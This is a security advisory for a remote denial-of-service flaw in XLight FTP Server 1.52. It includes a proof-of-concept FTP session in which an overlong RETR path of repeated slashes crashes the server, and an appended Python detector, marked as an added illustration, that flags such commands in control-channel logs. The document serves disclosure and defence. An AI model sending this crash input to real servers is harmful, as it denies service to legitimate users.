XLight FTP Server Remote Send File Request Denial Of Service Vulnerability
BID:9668
Info
| Bugtraq ID: | 9668 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 16 2004 12:00AM |
| Updated: | Feb 16 2004 12:00AM |
| Credit: | Disclosure of this issue has been credited to "intuit e.b." <[email protected]>. |
| Vulnerable: | XLight FTP Server 1.52 |
| Not Vulnerable: | |
Discussion
A remote denial of service vulnerability has been reported in the Send File Request functionality of the XLight FTP server. The issue is due to insufficient bounds checking.
Upon successful exploitation, a remote attacker may be able to cause the affected server to crash, denying service to legitimate users.
Exploit / POC
No exploit is required to leverage this issue. The following proof of concept has been provided:
ftp> open
To www.example.com
Connected to www.example.com.
220 Xlight Server 1.52 ready...
User (www.example.com:(none)): test
331 Password required for test
Password:
230 Login OK.
ftp> literal pasv
227 Entering passive mode .
ftp> literal retr /////////////////////////////////////////
///////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////
//////////////////////////////////////////qwer
Connection closed by remote host.
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
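With no vendor patch listed, requests shaped like the one in the proof of concept can be flagged on the FTP control channel, for example in a proxy or when reviewing command logs. The following is an added example, not part of the original advisory or of any vendor code; the thresholds, function names and sample lines are assumptions constructed for illustration.

```python
import re

# Assumed limits; the advisory does not state the length that crashes 1.52.
MAX_PATH_LEN = 255   # longest pathname argument accepted
MAX_SLASH_RUN = 8    # longest run of consecutive '/' tolerated

# RFC 959 commands whose argument is a pathname.
PATH_COMMANDS = {"RETR", "STOR", "APPE", "DELE", "CWD", "MKD", "RMD",
                 "LIST", "NLST", "RNFR", "RNTO"}
_SLASH_RUN = re.compile(r"/+")


def check_command(line):
    """Return the reasons an FTP control-channel line is suspicious ([] if none)."""
    verb, _, arg = line.rstrip("\r\n").partition(" ")
    if verb.upper() not in PATH_COMMANDS:
        return []
    reasons = []
    if len(arg) > MAX_PATH_LEN:
        reasons.append(f"path length {len(arg)} exceeds {MAX_PATH_LEN}")
    longest = max((len(m.group()) for m in _SLASH_RUN.finditer(arg)), default=0)
    if longest > MAX_SLASH_RUN:
        reasons.append(f"slash run {longest} exceeds {MAX_SLASH_RUN}")
    return reasons


def scan(lines):
    """Return (line_number, verb, reasons) for every flagged command."""
    hits = []
    for number, line in enumerate(lines, start=1):
        reasons = check_command(line)
        if reasons:
            hits.append((number, line.split(" ", 1)[0].upper(), reasons))
    return hits


# Constructed sample of client commands (not captured traffic).
SAMPLE = [
    "USER test\r\n",
    "PASV\r\n",
    "RETR /pub/readme.txt\r\n",
    "retr " + "/" * 260 + "qwer\r\n",
    "CWD //pub//incoming\r\n",
]

if __name__ == "__main__":
    for number, verb, reasons in scan(SAMPLE):
        print(f"line {number}: {verb}: {'; '.join(reasons)}")
```

Tune both limits to the longest legitimate path served by the host before rejecting, rather than only logging, flagged commands.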
References
References:
- Product Homepage (XLight FTP Server)
- Xlight ftp server 1.52 RETR bug ("intuit e.b.")